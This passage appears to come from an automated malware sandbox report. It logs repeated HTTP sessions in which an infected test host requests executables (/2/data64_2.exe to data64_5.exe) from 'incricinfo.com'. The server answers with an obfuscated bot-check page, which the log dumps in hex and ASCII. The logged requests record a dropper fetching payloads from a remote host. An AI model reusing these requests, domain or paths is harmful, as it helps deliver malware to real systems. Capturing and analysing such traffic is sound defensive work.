2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 65 61 73 74 3d 2b 28 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b
                                                                                                                          Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center;}</style></head><body><h1>Please wait while your request is being verified...</h1><form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="get"><input type="hidden" id="wsidchk" name="wsidchk"/></form><script>(function(){ var west=+((+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+[])+(+!+[]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![])), east=+((+!+[])+(+!+[]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+
                                                                                                                          May 21, 2022 09:31:08.674047947 CEST2204INData Raw: 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 21 21 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3b 7d 63 61
                                                                                                                          Data Ascii: !![]+!![]+!![]+[])), x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener("DOMContentLoaded",y,z) : document.attachEvent("onreadystatechange",y);}; y(fu


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          38192.168.2.449768103.147.182.4280
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          May 21, 2022 09:31:09.676897049 CEST2205OUTGET
                                                                                                                          Data Raw:
                                                                                                                          Data Ascii:
                                                                                                                          May 21, 2022 09:31:09.871892929 CEST2205OUTData Raw: 2f 32 2f 64 61 74 61 36 34 5f 32 2e 65 78 65 20 48 54 54 50 2f 31 2e 30 0d 0a 48 6f 73 74 3a 20 69 6e 63 72 69 63 69 6e 66 6f 2e 63 6f 6d 0d 0a 2a 41 63 63 65 70 74 3a 20 2a 2f 2a 0d 0a 2a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                                          Data Ascii: /2/data64_2.exe HTTP/1.0Host: incricinfo.com*Accept: */**Connection: closeUser-Agent: Firefox-3.0
                                                                                                                          May 21, 2022 09:31:10.067190886 CEST2207INHTTP/1.1 200 OK
                                                                                                                          Date: Sat, 21 May 2022 07:31:08 GMT
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Length: 1328
                                                                                                                          Connection: close
                                                                                                                          Server: imunify360-webshield/1.18
                                                                                                                          Last-Modified: Saturday, 21-May-2022 07:31:08 GMT
                                                                                                                          Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0
                                                                                                                          cf-edge-cache: no-cache
                                                                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 6c 65 61 73 65 20 77 61 69 74 20 77 68 69 6c 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 69 6e 67 20 76 65 72 69 66 69 65 64 2e 2e 2e 3c 2f 68 31 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 77 73 69 64 63 68 6b 2d 66 6f 72 6d 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 2f 7a 30 66 37 36 61 31 64 31 34 66 64 32 31 61 38 66 62 35 66 64 30 64 30 33 65 30 66 64 63 33 64 33 63 65 64 61 65 35 32 66 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 77 73 69 64 63 68 6b 22 20 6e 61 6d 65 3d 22 77 73 69 64 63 68 6b 22 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 77 65 73 74 3d 2b 28 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 5b 5d 29 2b 28 2b 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 65 61 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 21 21 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3b 7d 63
                                                                                                                          Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center;}</style></head><body><h1>Please wait while your request is being verified...</h1><form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="get"><input type="hidden" id="wsidchk" name="wsidchk"/></form><script>(function(){ var west=+((+!+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![])+(+!+[]+[])+(+![])+(+!+[]+[])+(+!+[]+!![]+!![])+(+!+[]+[])), east=+((+!+[]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![])+(+!+[]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])), x=function(){try{return !!window.addEventListener;}c
                                                                                                                          May 21, 2022 09:31:10.067342997 CEST2207INData Raw: 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 21 21 30 3b 7d 20 7d 2c 0a 20 20 20 20 20 20 20 20 79 3d 66 75 6e 63 74 69 6f 6e 28 79 2c 7a 29 7b 78 28 29 20 3f 20 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44
                                                                                                                          Data Ascii: atch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener("DOMContentLoaded",y,z) : document.attachEvent("onreadystatechange",y);}; y(function(){ document.getElementById('wsidchk').value = west + east;


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          39192.168.2.449769103.147.182.4280
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          May 21, 2022 09:31:10.552264929 CEST2208OUTGET
                                                                                                                          Data Raw:
                                                                                                                          Data Ascii:
                                                                                                                          May 21, 2022 09:31:10.747304916 CEST2208OUTData Raw: 2f 32 2f 64 61 74 61 36 34 5f 33 2e 65 78 65 20 48 54 54 50 2f 31 2e 30 0d 0a 48 6f 73 74 3a 20 69 6e 63 72 69 63 69 6e 66 6f 2e 63 6f 6d 0d 0a 2a 41 63 63 65 70 74 3a 20 2a 2f 2a 0d 0a 2a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                                          Data Ascii: /2/data64_3.exe HTTP/1.0Host: incricinfo.com*Accept: */**Connection: closeUser-Agent: Firefox-3.0
                                                                                                                          May 21, 2022 09:31:10.959985018 CEST2209INHTTP/1.1 200 OK
                                                                                                                          Date: Sat, 21 May 2022 07:31:09 GMT
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Length: 1383
                                                                                                                          Connection: close
                                                                                                                          Server: imunify360-webshield/1.18
                                                                                                                          Last-Modified: Saturday, 21-May-2022 07:31:09 GMT
                                                                                                                          Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0
                                                                                                                          cf-edge-cache: no-cache
                                                                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 6c 65 61 73 65 20 77 61 69 74 20 77 68 69 6c 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 69 6e 67 20 76 65 72 69 66 69 65 64 2e 2e 2e 3c 2f 68 31 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 77 73 69 64 63 68 6b 2d 66 6f 72 6d 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 2f 7a 30 66 37 36 61 31 64 31 34 66 64 32 31 61 38 66 62 35 66 64 30 64 30 33 65 30 66 64 63 33 64 33 63 65 64 61 65 35 32 66 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 77 73 69 64 63 68 6b 22 20 6e 61 6d 65 3d 22 77 73 69 64 63 68 6b 22 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 77 65 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 65 61 73 74 3d 2b 28 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 29 2c 0a 20 20 20 20 20
                                                                                                                          Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center;}</style></head><body><h1>Please wait while your request is being verified...</h1><form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="get"><input type="hidden" id="wsidchk" name="wsidchk"/></form><script>(function(){ var west=+((+!+[]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+[])+(+!+[])+(+!+[]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![])), east=+((+!+[])+(+!+[]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![])+(+![]+[])+(+!+[]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+[])),
                                                                                                                          May 21, 2022 09:31:10.960001945 CEST2210INData Raw: 20 20 20 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 21 21 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3b 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 21 21 30 3b 7d 20 7d 2c 0a 20 20 20
                                                                                                                          Data Ascii: x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener("DOMContentLoaded",y,z) : document.attachEvent("onreadystatechange",y);}; y(function(){ document


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          4192.168.2.449796151.115.10.1443
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          40192.168.2.449770103.147.182.4280
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          May 21, 2022 09:31:12.045074940 CEST2211OUTGET
                                                                                                                          Data Raw:
                                                                                                                          Data Ascii:
                                                                                                                          May 21, 2022 09:31:12.249232054 CEST2211OUTData Raw: 2f 32 2f 64 61 74 61 36 34 5f 34 2e 65 78 65 20 48 54 54 50 2f 31 2e 30 0d 0a 48 6f 73 74 3a 20 69 6e 63 72 69 63 69 6e 66 6f 2e 63 6f 6d 0d 0a 2a 41 63 63 65 70 74 3a 20 2a 2f 2a 0d 0a 2a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                                          Data Ascii: /2/data64_4.exe HTTP/1.0Host: incricinfo.com*Accept: */**Connection: closeUser-Agent: Firefox-3.0
                                                                                                                          May 21, 2022 09:31:12.452373981 CEST2212INHTTP/1.1 200 OK
                                                                                                                          Date: Sat, 21 May 2022 07:31:11 GMT
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Length: 1404
                                                                                                                          Connection: close
                                                                                                                          Server: imunify360-webshield/1.18
                                                                                                                          Last-Modified: Saturday, 21-May-2022 07:31:11 GMT
                                                                                                                          Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0
                                                                                                                          cf-edge-cache: no-cache
                                                                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 6c 65 61 73 65 20 77 61 69 74 20 77 68 69 6c 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 69 6e 67 20 76 65 72 69 66 69 65 64 2e 2e 2e 3c 2f 68 31 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 77 73 69 64 63 68 6b 2d 66 6f 72 6d 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 2f 7a 30 66 37 36 61 31 64 31 34 66 64 32 31 61 38 66 62 35 66 64 30 64 30 33 65 30 66 64 63 33 64 33 63 65 64 61 65 35 32 66 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 77 73 69 64 63 68 6b 22 20 6e 61 6d 65 3d 22 77 73 69 64 63 68 6b 22 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 77 65 73 74 3d 2b 28 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 65 61 73 74 3d 2b 28 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b
                                                                                                                          Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center;}</style></head><body><h1>Please wait while your request is being verified...</h1><form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="get"><input type="hidden" id="wsidchk" name="wsidchk"/></form><script>(function(){ var west=+((+!+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![])+(+!+[]+!![]+!![]+[])), east=+((+!+[])+(+!+[]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+![]+[])+(+!+[]+!![]+!![])+(+!+[]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+
                                                                                                                          May 21, 2022 09:31:12.452498913 CEST2213INData Raw: 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 21 21 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3b 7d 63 61 74 63 68 28 65
                                                                                                                          Data Ascii: !![]+!![]+[])), x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener("DOMContentLoaded",y,z) : document.attachEvent("onreadystatechange",y);}; y(functio


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          41192.168.2.449771103.147.182.4280
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          May 21, 2022 09:31:13.128241062 CEST2213OUTGET
                                                                                                                          Data Raw:
                                                                                                                          Data Ascii:
                                                                                                                          May 21, 2022 09:31:13.323458910 CEST2213OUTData Raw: 2f 32 2f 64 61 74 61 36 34 5f 35 2e 65 78 65 20 48 54 54 50 2f 31 2e 30 0d 0a 48 6f 73 74 3a 20 69 6e 63 72 69 63 69 6e 66 6f 2e 63 6f 6d 0d 0a 2a 41 63 63 65 70 74 3a 20 2a 2f 2a 0d 0a 2a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                                          Data Ascii: /2/data64_5.exe HTTP/1.0Host: incricinfo.com*Accept: */**Connection: closeUser-Agent: Firefox-3.0
                                                                                                                          May 21, 2022 09:31:13.518909931 CEST2215INHTTP/1.1 200 OK
                                                                                                                          Date: Sat, 21 May 2022 07:31:12 GMT
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Length: 1431
                                                                                                                          Connection: close
                                                                                                                          Server: imunify360-webshield/1.18
                                                                                                                          Last-Modified: Saturday, 21-May-2022 07:31:12 GMT
                                                                                                                          Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0
                                                                                                                          cf-edge-cache: no-cache
